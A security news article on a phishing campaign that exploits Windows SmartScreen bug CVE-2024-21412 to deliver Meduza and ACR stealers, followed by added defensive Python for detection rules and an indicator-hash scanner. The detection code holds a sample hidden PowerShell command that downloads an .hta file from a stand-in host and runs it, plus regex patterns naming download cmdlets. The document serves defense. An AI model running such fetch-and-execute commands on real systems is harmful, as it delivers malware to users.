Microsoft SmartScreen bug exploited in an infostealer campaign

Researchers have uncovered an info stealer campaign targeting Microsoft Windows users. This campaign exploits a known vulnerability to bypass security measures and steal sensitive data.

The vulnerability tracked as CVE-2024-21412 is a security bypass in Microsoft Windows SmartScreen. The flaw allows remote attackers to bypass the SmartScreen security warning dialogue and deliver malicious files.

Many attack campaigns, including Lumma Stealer and Meduza Stealer, have exploited this vulnerability in the past.

The campaign’s attack sequence:

  • Initial Phishing: The campaign begins with a phishing email containing a malicious link. Clicking the link downloads a URL file that, in turn, downloads an LNK file.
  • LNK File Execution: The LNK file uses PowerShell commands to download an HTA script disguised as an overlay icon.
  • HTA Script Decodes Payload: The HTA script retrieves and executes a hidden PowerShell script, which runs silently and downloads a decoy PDF along with a malicious shellcode injector; the injector places the final stealer into legitimate processes.
  • Shellcode Injection: Two types of injector have been identified. The first obtains its shellcode from an image file and has low detection rates on VirusTotal: it downloads a JPG file from the Imghippo website and uses the Windows API “GdipBitmapGetPixel” to read pixel values and decode them into shellcode bytes. The second injector is more straightforward, decrypting its code from the data section and using a series of Windows API functions to perform the injection.
  • Stealer Deployment: The injected code downloads and installs information-stealing malware such as Meduza Stealer version 2.9 or ACR Stealer.
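For defenders, the useful part of the chain above is that each stage leaves a process-creation event with a recognisable shape: PowerShell fetching an .hta from the network, mshta.exe spawning a hidden PowerShell, and an encoded PowerShell command. The following is an added example, not code from the article or from FortiGuard, that applies three simple rules of that kind to constructed sample events; the event field names, the command lines and the `example.invalid` host are assumptions for illustration, not indicators from the research.

```python
"""Added example (not from the article or from FortiGuard): score constructed
process-creation events for the LNK -> PowerShell -> HTA -> hidden PowerShell
chain described in the article.  Field names and sample command lines are
assumptions for illustration only."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    parent: str    # image name of the parent process
    image: str     # image name of the created process
    cmdline: str   # full command line of the created process


# Constructed sample telemetry (not real logs): one benign event followed by
# two events shaped like the staged chain in the article.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -Command Get-Date"),
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell.exe -w hidden -c "iwr http://example.invalid/icon '
              '-OutFile $env:TEMP\\overlay.hta; mshta $env:TEMP\\overlay.hta"'),
    ProcEvent("mshta.exe", "powershell.exe",
              "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
              "-enc QQBCAEMARABFAEYA"),
]

DOWNLOAD_CMDLETS = re.compile(
    r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod|"
    r"downloadfile|downloadstring)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
ENCODED_COMMAND = re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I)


def powershell_downloads_hta(e: ProcEvent) -> bool:
    """LNK stage: PowerShell fetching something written out as an .hta file."""
    cl = e.cmdline.lower()
    return (e.image == "powershell.exe"
            and bool(DOWNLOAD_CMDLETS.search(cl))
            and ".hta" in cl)


def mshta_spawns_hidden_powershell(e: ProcEvent) -> bool:
    """HTA stage: mshta.exe launching PowerShell with a hidden window."""
    return (e.parent == "mshta.exe"
            and e.image == "powershell.exe"
            and bool(HIDDEN_WINDOW.search(e.cmdline)))


def encoded_powershell(e: ProcEvent) -> bool:
    """Any PowerShell launched with a base64-encoded command."""
    return e.image == "powershell.exe" and bool(ENCODED_COMMAND.search(e.cmdline))


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("powershell_downloads_hta", powershell_downloads_hta),
    ("mshta_spawns_hidden_powershell", mshta_spawns_hidden_powershell),
    ("encoded_powershell", encoded_powershell),
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every rule that fires on each event."""
    return [(name, ev.cmdline) for ev in events for name, rule in RULES if rule(ev)]


def chain_score(events: List[ProcEvent]) -> int:
    """Count distinct rules that fired; several together point to the staged
    chain rather than a one-off PowerShell invocation."""
    return len({name for name, _ in evaluate(events)})


if __name__ == "__main__":
    for name, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
    print("distinct rules fired:", chain_score(SAMPLE_EVENTS))
```

Each rule on its own will produce some benign hits in an enterprise; correlating them per host and per session (what `chain_score` does crudely for one list of events) is what turns them into a usable alert for this kind of multi-stage loader.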

The ACR Stealer targets a wide range of applications, including browsers, crypto wallets, messengers, FTP clients, email clients, VPN services, password managers, and other tools. The stealer can also leverage legitimate web services to maintain communication with its C2 server.

The campaign seems to target specific regions, with decoy PDFs tailored to North America, Spain, and Thailand.

Installing the latest security updates that address CVE-2024-21412 is crucial to staying protected.

Users should be cautious of phishing links and downloading unknown files. Email security solutions can detect and block phishing attempts.

This research was documented by researchers from FortiGuard Labs.

Indicators of Compromise

  • e15b200048fdddaedb24a84e99d6d7b950be020692c02b46902bf5af8fb50949
  • 547b6e08b0142b4f8d024bac78eb1ff399198a8d8505ce365b352e181fc4a544
  • bd823f525c128149d70f633e524a06a0c5dc1ca14dd56ca7d2a8404e5a573078
  • 982338768465b79cc8acd873a1be2793fccbaa4f28933bcdf56b1d8aa6919b47
  • bc6933a8fc324b907e6cf3ded3f76adc27a6ad2445b4f5db1723ac3ec86ed10d
  • 59d2c2ca389ab1ba1fefa4a06b14ae18a8f5b70644158d5ec4fb7a7eac4c0a08
  • 8568226767ac2748eccc7b9832fac33e8aa6bfdc03eafa6a34fb5d81e5992497
  • 4043aa37b5ba577dd99f6ca35c644246094f4f579415652895e6750fb9823bd9
  • 0604e7f0b4f7790053991c33359ad427c9bf74c62bec3e2d16984956d0fb9c19
  • 8c6d355a987bb09307e0af6ac8c3373c1c4cbfbceeeb1159a96a75f19230ede6
  • de6960d51247844587a21cc0685276f966747e324eb444e6e975b0791556f34f
  • 6c779e427b8d861896eacdeb812f9f388ebd43f587c84a243c7dab9ef65d151c
  • 08c75c6a9582d49ea3fe780509b6f0c9371cfcd0be130bc561fae658b055a671
  • abc54ff9f6823359071d755b151233c08bc2ed1996148ac61cfb99c7e8392bfe
  • 643dde3f461907a94f145b3cd8fe37dbad63aec85a4e5ed759fe843b9214a8d2
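The indicators above are SHA-256 file hashes, so the most direct use of them is to hash files on a suspect host and look for matches. The script below is an added example, not tooling from the article or from FortiGuard; it embeds the article’s fifteen hashes and walks a directory tree, and its `demo()` function runs the scan over a temporary directory with constructed files so it can be tried offline.

```python
"""Added example (not from the article or from FortiGuard): hash files under a
directory tree and report any that match the SHA-256 indicators listed in the
article.  The sample files written by demo() are constructed."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# SHA-256 indicators exactly as published in the article.
IOC_SHA256 = frozenset({
    "e15b200048fdddaedb24a84e99d6d7b950be020692c02b46902bf5af8fb50949",
    "547b6e08b0142b4f8d024bac78eb1ff399198a8d8505ce365b352e181fc4a544",
    "bd823f525c128149d70f633e524a06a0c5dc1ca14dd56ca7d2a8404e5a573078",
    "982338768465b79cc8acd873a1be2793fccbaa4f28933bcdf56b1d8aa6919b47",
    "bc6933a8fc324b907e6cf3ded3f76adc27a6ad2445b4f5db1723ac3ec86ed10d",
    "59d2c2ca389ab1ba1fefa4a06b14ae18a8f5b70644158d5ec4fb7a7eac4c0a08",
    "8568226767ac2748eccc7b9832fac33e8aa6bfdc03eafa6a34fb5d81e5992497",
    "4043aa37b5ba577dd99f6ca35c644246094f4f579415652895e6750fb9823bd9",
    "0604e7f0b4f7790053991c33359ad427c9bf74c62bec3e2d16984956d0fb9c19",
    "8c6d355a987bb09307e0af6ac8c3373c1c4cbfbceeeb1159a96a75f19230ede6",
    "de6960d51247844587a21cc0685276f966747e324eb444e6e975b0791556f34f",
    "6c779e427b8d861896eacdeb812f9f388ebd43f587c84a243c7dab9ef65d151c",
    "08c75c6a9582d49ea3fe780509b6f0c9371cfcd0be130bc561fae658b055a671",
    "abc54ff9f6823359071d755b151233c08bc2ed1996148ac61cfb99c7e8392bfe",
    "643dde3f461907a94f145b3cd8fe37dbad63aec85a4e5ed759fe843b9214a8d2",
})


def is_known_ioc(digest: str) -> bool:
    """True when a hex SHA-256 digest (any case) is one of the article's indicators."""
    return digest.strip().lower() in IOC_SHA256


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def scan_tree(root: str) -> List[Tuple[str, str]]:
    """Walk root and return (path, digest) for every file whose hash is an IoC.
    Unreadable files are skipped rather than aborting the scan."""
    matches = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            try:
                digest = sha256_of(p)
            except OSError:
                continue
            if is_known_ioc(digest):
                matches.append((str(p), digest))
    return matches


def demo() -> Dict[str, object]:
    """Scan a temporary directory holding two constructed files: an empty file
    (whose SHA-256 is well known) and a small text file.  Neither is an IoC."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "empty.bin").write_bytes(b"")
        (Path(d) / "sample.txt").write_bytes(b"constructed sample content\n")
        return {
            "matches": scan_tree(d),
            "empty_digest": sha256_of(Path(d) / "empty.bin"),
        }


if __name__ == "__main__":
    result = demo()
    print("IoC matches in demo directory:", result["matches"])
    print("SHA-256 of empty file:", result["empty_digest"])
```

Run `scan_tree()` against user profile and temporary directories on a host suspected of having opened the phishing link; a match on any of these hashes is a strong indication the host should be isolated and triaged rather than simply cleaned.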
